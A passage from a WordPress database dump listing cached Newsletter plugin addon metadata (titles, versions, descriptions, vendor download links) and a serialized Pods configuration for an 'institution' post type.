SendGrid.\",\"slug\":\"newsletter-sendgrid\",\"type\":\"delivery\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/delivery-addons\\/sendgrid-extension\\/\",\"image\":\"https:\\/\\/cdn.thenewsletterplugin.com\\/extensions\\/design-32px-outline_newsletter-dev.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=48\",\"wp_slug\":\"newsletter-sendgrid\\/sendgrid.php\"},{\"id\":\"52\",\"category\":\"delivery\",\"version\":\"4.3.0\",\"title\":\"Mailjet\",\"description\":\"Send emails and automatically process bounces with Mailjet.\",\"slug\":\"newsletter-mailjet\",\"type\":\"delivery\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/delivery-addons\\/mailjet-extension\\/\",\"image\":\"https:\\/\\/cdn.thenewsletterplugin.com\\/extensions\\/design-32px-outline_newsletter-dev.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=52\",\"wp_slug\":\"newsletter-mailjet\\/mailjet.php\"},{\"id\":\"66\",\"category\":\"delivery\",\"version\":\"1.3.3\",\"title\":\"ElasticEmail\",\"description\":\"Send emails and automatically process bounces with ElasticEmail.\",\"slug\":\"newsletter-elasticemail\",\"type\":\"delivery\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/delivery-addons\\/elasticemail-extension\\/\",\"image\":\"https:\\/\\/cdn.thenewsletterplugin.com\\/extensions\\/design-32px-outline_newsletter-dev.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=66\",\"wp_slug\":\"newsletter-elasticemail\\/elasticemail.php\"},{\"id\":\"105\",\"category\":\"subscription\",\"version\":\"1.2.3\",\"title\":\"Fluent Forms Connect\",\"description\":\"Collect subscribers with your Fluent Forms plugin.\",\"slug\":\"newsletter-fluentforms\",\"type\":\"integration\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/premium\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2023\\/03\\/fluentforms-32x32-1.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=105\",\"wp_slug\":\"newsletter-fluentforms\\/fluentforms.php\"},{\"id\":\"69\",\"category\":\"delivery\",\"version\":\"1.3.2\",\"title\":\"SparkPost\",\"description\":\"Send emails and automatically process bounces with SparkPost.\",\"slug\":\"newsletter-sparkpost\",\"type\":\"delivery\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/delivery-addons\\/sparkpost-extension\\/\",\"image\":\"https:\\/\\/cdn.thenewsletterplugin.com\\/extensions\\/design-32px-outline_newsletter-dev.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=69\",\"wp_slug\":\"newsletter-sparkpost\\/sparkpost.php\"},{\"id\":\"75\",\"category\":\"statistics\",\"version\":\"1.3.4\",\"title\":\"Geolocation\",\"description\":\"Geolocate the subscribers and target them by geolocation in your campaign.\",\"slug\":\"newsletter-geo\",\"type\":\"extension\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/extended-features\\/geolocation-extension\\/\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2018\\/03\\/geo-extension-icon.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=75\",\"wp_slug\":\"newsletter-geo\\/geo.php\"},{\"id\":\"63\",\"category\":\"newsletters, subscription\",\"version\":\"2.0.2\",\"title\":\"WooCommerce\",\"description\":\"Subscribe on checkout, subscribers import, segmentation by cart products, and newsletter composer products block.\",\"slug\":\"newsletter-woocommerce\",\"type\":\"integration\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/woocommerce\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2018\\/03\\/woocommerce-extension-icon.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=63\",\"wp_slug\":\"newsletter-woocommerce\\/woocommerce.php\"},{\"id\":\"122\",\"category\":\"delivery\",\"version\":\"1.0.9\",\"title\":\"SendPulse Integration\",\"description\":\"Integrates Newsletter with SendPulse\",\"slug\":\"newsletter-sendpulse\",\"type\":\"delivery \",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/delivery-addons\\/sendpulse\\/\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2025\\/03\\/sendpulse-32x32-1.png\",\"free\":true,\"downloadable\":true,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=122\",\"wp_slug\":\"newsletter-sendpulse\\/sendpulse.php\"},{\"id\":\"50\",\"category\":\"statistics\",\"version\":\"4.7.3\",\"title\":\"Reports and Retargeting\",\"description\":\"Detailed statistics of your campaign (opens, clicks, URLs) and retargeting based on subscriber behavior.\",\"slug\":\"newsletter-reports\",\"type\":\"extension\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/reports\",\"image\":\"https:\\/\\/cdn.thenewsletterplugin.com\\/extensions\\/business-32px-outline_chart-bar-33.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=50\",\"wp_slug\":\"newsletter-reports\\/reports.php\"},{\"id\":\"68\",\"category\":\"statistics\",\"version\":\"1.3.2\",\"title\":\"Google Analytics\",\"description\":\"Automatically add Google Analytics UTM campaign tracking to links\",\"slug\":\"newsletter-analytics\",\"type\":\"extension\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/google-analytics\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2021\\/08\\/analytics.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=68\",\"wp_slug\":\"newsletter-analytics\\/analytics.php\"},{\"id\":\"124\",\"category\":\"delivery\",\"version\":\"1.1.1\",\"title\":\"SMTP.com Integration\",\"description\":\"Integration with the delivery service SMTP.com\",\"slug\":\"newsletter-smtpcom\",\"type\":\"delivery\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/delivery-addons\\/smtpcom-extension\\/\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2025\\/05\\/smtpcom-1.png\",\"free\":true,\"downloadable\":true,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=124\",\"wp_slug\":\"newsletter-smtpcom\\/smtpcom.php\"},{\"id\":\"90\",\"category\":\"delivery\",\"version\":\"1.3.3\",\"title\":\"Brevo (formerly Sendinblue)\",\"description\":\"Send emails and automatically process bounces and complaints with Brevo (formerly Sendinblue).\",\"slug\":\"newsletter-sendinblue\",\"type\":\"delivery\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/delivery-addons\\/sendinblue-extension\\/\",\"image\":\"https:\\/\\/cdn.thenewsletterplugin.com\\/extensions\\/design-32px-outline_newsletter-dev.png\",\"free\":true,\"downloadable\":true,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=90\",\"wp_slug\":\"newsletter-sendinblue\\/sendinblue.php\"},{\"id\":\"74\",\"category\":\"newsletters\",\"version\":\"1.7.1\",\"title\":\"Extended Composer Blocks\",\"description\":\"Adds new blocks to the newsletter composer: list, video, gallery, full post.\",\"slug\":\"newsletter-blocks\",\"type\":\"extension\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/composer\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2017\\/04\\/ui-32px-outline-3_widget.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=74\",\"wp_slug\":\"newsletter-blocks\\/blocks.php\"},{\"id\":\"62\",\"category\":\"automation\",\"version\":\"4.9.4\",\"title\":\"Automated\",\"description\":\"Automatically creates periodic newsletters with your blog content (posts, products, events, CPTs).\",\"slug\":\"newsletter-automated\",\"type\":\"extension\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/automated\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2021\\/03\\/automated-32.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=62\",\"wp_slug\":\"newsletter-automated\\/automated.php\"},{\"id\":\"77\",\"category\":\"tools\",\"version\":\"2.5.7\",\"title\":\"Newsletter API\",\"description\":\"Access programmatically to The Newsletter Plugin via REST calls.\",\"slug\":\"newsletter-api\",\"type\":\"extension\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/developers\\/newsletter-api-2\\/\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2017\\/10\\/bold-direction@2x-1.png\",\"free\":true,\"downloadable\":true,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=77\",\"wp_slug\":\"newsletter-api\\/api.php\"},{\"id\":\"85\",\"category\":\"\",\"version\":\"1.4.0\",\"title\":\"Addons Manager\",\"description\":\"\",\"slug\":\"newsletter-extensions\",\"type\":\"manager\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/account\",\"image\":\"\",\"free\":true,\"downloadable\":true,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=85\",\"wp_slug\":\"newsletter-extensions\\/extensions.php\"},{\"id\":\"100\",\"category\":\"subscription, newsletters\",\"version\":\"1.1.0\",\"title\":\"Easy Digital Downloads\",\"description\":\"Subscribe on checkout and newsletter composer products block.\",\"slug\":\"newsletter-edd\",\"type\":\"integration\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/integrations\\/edd-extension\\/\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2021\\/08\\/edd.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=100\",\"wp_slug\":\"newsletter-edd\\/edd.php\"},{\"id\":\"72\",\"category\":\"automation\",\"version\":\"1.7.2\",\"title\":\"Autoresponder\",\"description\":\"Create unlimited email series to follow-up your subscribers. Lessons, up-sells, conversations.\",\"slug\":\"newsletter-autoresponder\",\"type\":\"extension\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/autoresponder\",\"image\":\"https:\\/\\/cdn.thenewsletterplugin.com\\/extensions\\/emoticons-32px-outline_robot.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=72\",\"wp_slug\":\"newsletter-autoresponder\\/autoresponder.php\"},{\"id\":\"115\",\"category\":\"newsletters\",\"version\":\"1.1.3\",\"title\":\"EventPrime Integration\",\"description\":\"Adds a block to insert into newsletters from EventPrime\",\"slug\":\"newsletter-eventprime\",\"type\":\"integration\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/account\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2024\\/09\\/eventprime.png\",\"free\":true,\"downloadable\":true,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=115\",\"wp_slug\":\"newsletter-eventprime\\/eventprime.php\"},{\"id\":\"79\",\"category\":\"newsletters\",\"version\":\"1.5.4\",\"title\":\"Events Manager\",\"description\":\"Adds a composer block that extracts the events managed by the Events Manager plugin.\",\"slug\":\"newsletter-events\",\"type\":\"integration\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/integrations\\/events-extension\\/\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2019\\/02\\/events-manager-icon.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=79\",\"wp_slug\":\"newsletter-events\\/events.php\"},{\"id\":\"82\",\"category\":\"tools\",\"version\":\"1.0.3\",\"title\":\"Translatepress Bridge\",\"description\":\"Enables few multilanguage Newsletter features for who is using Translatepress.\",\"slug\":\"newsletter-translatepress\",\"type\":\"integration\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/integrations\\/translatepress-extension\\/\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2018\\/09\\/translatepress.png\",\"free\":true,\"downloadable\":true,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=82\",\"wp_slug\":\"newsletter-translatepress\\/translatepress.php\"},{\"id\":\"88\",\"category\":\"newsletters\",\"version\":\"1.5.5\",\"title\":\"The Events Calendar (by Tribe)\",\"description\":\"Adds a composer block that extracts the events managed by The Events Calendar plugin.\",\"slug\":\"newsletter-tribeevents\",\"type\":\"integration\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/integrations\\/tribeevents-extension\\/\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2019\\/02\\/tribe-event-calendar-icon.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=88\",\"wp_slug\":\"newsletter-tribeevents\\/tribeevents.php\"},{\"id\":\"55\",\"category\":\"legacy\",\"version\":\"4.1.2\",\"title\":\"Facebook\",\"description\":\"One click subscription and confirmation with Facebook Connect.\",\"slug\":\"newsletter-facebook\",\"type\":\"integration\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/integrations\\/facebook-extension\\/\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2021\\/08\\/facebook.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=55\",\"wp_slug\":\"newsletter-facebook\\/facebook.php\"},{\"id\":\"86\",\"category\":\"tools\",\"version\":\"1.6.2\",\"title\":\"Import and Export\",\"description\":\"An advanced import system with extended profile fields and mapping (beta version).\",\"slug\":\"newsletter-import\",\"type\":\"extension\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/extended-features\\/advanced-import\\/\",\"image\":\"https:\\/\\/cdn.thenewsletterplugin.com\\/extensions\\/file-upload-88.png\",\"free\":true,\"downloadable\":true,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=86\",\"wp_slug\":\"newsletter-import\\/import.php\"},{\"id\":\"95\",\"category\":\"delivery\",\"version\":\"1.2.2\",\"title\":\"Mailersend\",\"description\":\"Send emails and automatically process bounces and complaints with MailerSend.\",\"slug\":\"newsletter-mailersend\",\"type\":\"delivery\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/account\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2025\\/06\\/mailersend.png\",\"free\":true,\"downloadable\":true,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=95\",\"wp_slug\":\"newsletter-mailersend\\/mailersend.php\"},{\"id\":\"67\",\"category\":\"subscription\",\"version\":\"1.6.4\",\"title\":\"Leads\",\"description\":\"Add a popup or a fixed subscription bar to your website and offer your visitors a simple way to subscribe.\",\"slug\":\"newsletter-leads\",\"type\":\"extension\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/leads\",\"image\":\"https:\\/\\/cdn.thenewsletterplugin.com\\/extensions\\/ui-32px-outline-3_widget.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=67\",\"wp_slug\":\"newsletter-leads\\/leads.php\"},{\"id\":\"97\",\"category\":\"tools\",\"version\":\"1.1.2\",\"title\":\"Webhooks\",\"description\":\"Adds webhooks to trigger external services upon subscription and cancellation events.\",\"slug\":\"newsletter-webhooks\",\"type\":\"extension\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/developers\\/newsletter-webhooks\\/\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2017\\/10\\/bold-direction@2x-1.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=97\",\"wp_slug\":\"newsletter-webhooks\\/webhooks.php\"},{\"id\":\"126\",\"category\":\"automation\",\"version\":\"1.0.7\",\"title\":\"Yearly Newsletters (BETA)\",\"description\":\"Schedule messages that are sent once a year.\",\"slug\":\"newsletter-recurring\",\"type\":\"extension\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/account\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2026\\/02\\/newsletter-recurring-icon.png\",\"free\":true,\"downloadable\":true,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=126\",\"wp_slug\":\"newsletter-recurring\\/recurring.php\"},{\"id\":\"70\",\"category\":\"subscription\",\"version\":\"1.2.1\",\"title\":\"Subscribe on Comment\",\"description\":\"Adds the subscription option to your blog comment form.\",\"slug\":\"newsletter-comments\",\"type\":\"integration\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/extended-features\\/comments-extension\\/\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2017\\/02\\/comment-notification.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=70\",\"wp_slug\":\"newsletter-comments\\/comments.php\"},{\"id\":\"71\",\"category\":\"subscription\",\"version\":\"1.2.1\",\"title\":\"Locked Content\",\"description\":\"Hide premium content in your posts and offer a subscription to see them.\",\"slug\":\"newsletter-lock\",\"type\":\"extension\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/extended-features\\/locked-content-extension\\/\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2017\\/04\\/ui-32px-outline-1_lock-open.png\",\"free\":true,\"downloadable\":true,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=71\",\"wp_slug\":\"newsletter-lock\\/lock.php\"},{\"id\":\"58\",\"category\":\"tools\",\"version\":\"4.2.3\",\"title\":\"Public Archive\",\"description\":\"Generates a public archive of the sent newsletters for your blog.\",\"slug\":\"newsletter-archive\",\"type\":\"extension\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/extended-features\\/archive-extension\\/\",\"image\":\"https:\\/\\/cdn.thenewsletterplugin.com\\/extensions\\/files-32px-outline_archive-3d-content.png\",\"free\":true,\"downloadable\":true,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=58\",\"wp_slug\":\"newsletter-archive\\/archive.php\"},{\"id\":\"54\",\"category\":\"eol\",\"version\":\"4.1.3\",\"title\":\"Followup\",\"description\":\"Automated email series sent upon subscription at defined intervals.\",\"slug\":\"newsletter-followup\",\"type\":\"eol\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/plugins\\/newsletter\\/follow-up-module\",\"image\":\"https:\\/\\/cdn.thenewsletterplugin.com\\/extensions\\/ui-32px-outline-2_time-countdown.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=54\",\"wp_slug\":\"newsletter-followup\\/followup.php\"},{\"id\":\"53\",\"category\":\"eol\",\"version\":\"2.2.0\",\"title\":\"Popup\",\"description\":\"Configurable popup system to increase the subscription rate.\",\"slug\":\"newsletter-popup\",\"type\":\"eol\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/plugins\\/newsletter\\/popup-module\",\"image\":\"https:\\/\\/cdn.thenewsletterplugin.com\\/extensions\\/ui-32px-outline-3_widget.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=53\",\"wp_slug\":\"newsletter-popup\\/popup.php\"},{\"id\":\"51\",\"category\":\"eol\",\"version\":\"4.1.3\",\"title\":\"Feed by Mail\",\"description\":\"Automatically creates and sends newsletters with the latest blog posts.\",\"slug\":\"newsletter-feed\",\"type\":\"eol\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/feed-by-mail-extension\",\"image\":\"https:\\/\\/cdn.thenewsletterplugin.com\\/extensions\\/ui-32px-outline-3_playlist.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=51\",\"wp_slug\":\"newsletter-feed\\/feed.php\"},{\"id\":\"49\",\"category\":\"eol\",\"version\":\"4.0.0\",\"title\":\"Mandrill\",\"description\":\"Integrates the Mandrill delivery system and bounce detection.\",\"slug\":\"newsletter-mandrill\",\"type\":\"eol\",\"url\":\"http:\\/\\/www.thenewsletterplugin.com\\/plugins\\/newsletter\\/mandrill-module\",\"image\":\"https:\\/\\/cdn.thenewsletterplugin.com\\/extensions\\/design-32px-outline_newsletter-dev.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=49\",\"wp_slug\":\"newsletter-mandrill\\/mandrill.php\"},{\"id\":\"93\",\"category\":\"delivery\",\"version\":\"1.2.5\",\"title\":\"External SMTP\",\"description\":\"Send emails with a generic SMTP.\",\"slug\":\"newsletter-smtp\",\"type\":\"delivery\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/delivery-addons\\/smtp-extension\\/\",\"image\":\"https:\\/\\/cdn.thenewsletterplugin.com\\/extensions\\/design-32px-outline_newsletter-dev.png\",\"free\":true,\"downloadable\":true,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=93\",\"wp_slug\":\"newsletter-smtp\\/smtp.php\"},{\"id\":\"96\",\"category\":\"delivery\",\"version\":\"1.0.6\",\"title\":\"Office 365 Header Removal\",\"description\":\"This addon removes hidden headers from outgoing email to avoid Office365 SMTP block (or attempt to...). Install ONLY if you\'re using Office365 SMTP with an SMTP plugin!\",\"slug\":\"newsletter-office365\",\"type\":\"delivery\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/account\",\"image\":\"https:\\/\\/cdn.thenewsletterplugin.com\\/extensions\\/design-32px-outline_newsletter-dev.png\",\"free\":true,\"downloadable\":true,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=96\",\"wp_slug\":\"newsletter-office365\\/office365.php\"},{\"id\":\"91\",\"category\":\"newsletters\",\"version\":\"1.0.6\",\"title\":\"Instasend\",\"description\":\"Quickly create a newsletter from a post (free for limited time)\",\"slug\":\"newsletter-instasend\",\"type\":\"extension\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/extended-features\\/instasend\\/\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2020\\/05\\/instasend-32.png\",\"free\":true,\"downloadable\":true,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=91\",\"wp_slug\":\"newsletter-instasend\\/instasend.php\"},{\"id\":\"76\",\"category\":\"tools\",\"version\":\"1.3.7\",\"title\":\"Bounce Management\",\"description\":\"Bounce management (only if do not use a delivery addon).\",\"slug\":\"newsletter-bounce\",\"type\":\"extension\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/extended-features\\/bounce-extension\\/\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2017\\/10\\/ic_settings_backup_restore_32px.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=76\",\"wp_slug\":\"newsletter-bounce\\/bounce.php\"},{\"id\":\"128\",\"category\":\"tools\",\"version\":\"1.1.2\",\"title\":\"Newsletter Abilities\",\"description\":\"Adds WP Abilities for use with AI agents\",\"slug\":\"newsletter-abilities\",\"type\":\"extension\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/account\",\"image\":\"\",\"free\":true,\"downloadable\":true,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=128\",\"wp_slug\":\"newsletter-abilities\\/abilities.php\"}]','off'),(5635417,'_transient_timeout_pods_512a22f6a662275b5d6f2a0b2ca5a0bd','1782403632','off');
INSERT INTO `wp_options` VALUES (5635418,'_transient_pods_512a22f6a662275b5d6f2a0b2ca5a0bd','a:28:{s:11:\"object_type\";s:9:\"post_type\";s:4:\"type\";s:9:\"post_type\";s:11:\"object_name\";s:11:\"institution\";s:19:\"object_hierarchical\";b:0;s:7:\"storage\";s:4:\"meta\";s:5:\"table\";s:8:\"wp_posts\";s:10:\"meta_table\";s:11:\"wp_postmeta\";s:9:\"pod_table\";s:19:\"wp_pods_institution\";s:8:\"field_id\";s:2:\"ID\";s:11:\"field_index\";s:10:\"post_title\";s:10:\"field_slug\";s:9:\"post_name\";s:10:\"field_type\";s:9:\"post_type\";s:12:\"field_parent\";s:11:\"post_parent\";s:19:\"field_parent_select\";s:17:\"`t`.`post_parent`\";s:13:\"meta_field_id\";s:7:\"post_id\";s:16:\"meta_field_index\";s:8:\"meta_key\";s:16:\"meta_field_value\";s:10:\"meta_value\";s:12:\"pod_field_id\";s:2:\"id\";s:15:\"pod_field_index\";s:4:\"name\";s:14:\"pod_field_slug\";N;s:16:\"pod_field_parent\";N;s:4:\"join\";a:0:{}s:5:\"where\";a:1:{s:9:\"post_type\";s:31:\"`t`.`post_type` = \'institution\'\";}s:13:\"where_default\";s:34:\"`t`.`post_status` IN ( \'publish\' )\";s:7:\"orderby\";s:51:\"`t`.`menu_order`, `t`.`post_title`, `t`.`post_date`\";s:3:\"pod\";O:16:\"Pods\\Whatsit\\Pod\":1:{s:7:\"\0*\0args\";a:68:{s:11:\"object_type\";s:3:\"pod\";s:19:\"object_storage_type\";s:9:\"post_type\";s:4:\"name\";s:11:\"institution\";s:2:\"id\";i:714;s:6:\"parent\";s:0:\"\";s:5:\"group\";s:0:\"\";s:5:\"label\";s:12:\"Institutions\";s:11:\"description\";s:0:\"\";s:6:\"weight\";i:0;s:25:\"_elementor_controls_usage\";a:0:{}s:14:\"label_singular\";s:11:\"Institution\";s:6:\"public\";s:1:\"1\";s:7:\"show_ui\";s:1:\"1\";s:14:\"supports_title\";s:1:\"1\";s:15:\"supports_editor\";s:1:\"1\";s:4:\"type\";s:9:\"post_type\";s:7:\"storage\";s:4:\"meta\";s:8:\"old_name\";s:11:\"institution\";s:18:\"publicly_queryable\";s:1:\"1\";s:19:\"exclude_from_search\";s:1:\"0\";s:15:\"capability_type\";s:4:\"page\";s:22:\"capability_type_custom\";s:11:\"institution\";s:21:\"capability_type_extra\";s:1:\"1\";s:11:\"has_archive\";s:1:\"0\";s:12:\"hierarchical\";s:1:\"0\";s:7:\"rewrite\";s:1:\"1\";s:18:\"rewrite_with_front\";s:1:\"1\";s:13:\"rewrite_feeds\";s:1:\"0\";s:13:\"rewrite_pages\";s:1:\"1\";s:9:\"query_var\";s:1:\"1\";s:10:\"can_export\";s:1:\"1\";s:14:\"default_status\";s:5:\"draft\";s:15:\"supports_author\";s:1:\"0\";s:18:\"supports_thumbnail\";s:1:\"1\";s:16:\"supports_excerpt\";s:1:\"1\";s:19:\"supports_trackbacks\";s:1:\"0\";s:22:\"supports_custom_fields\";s: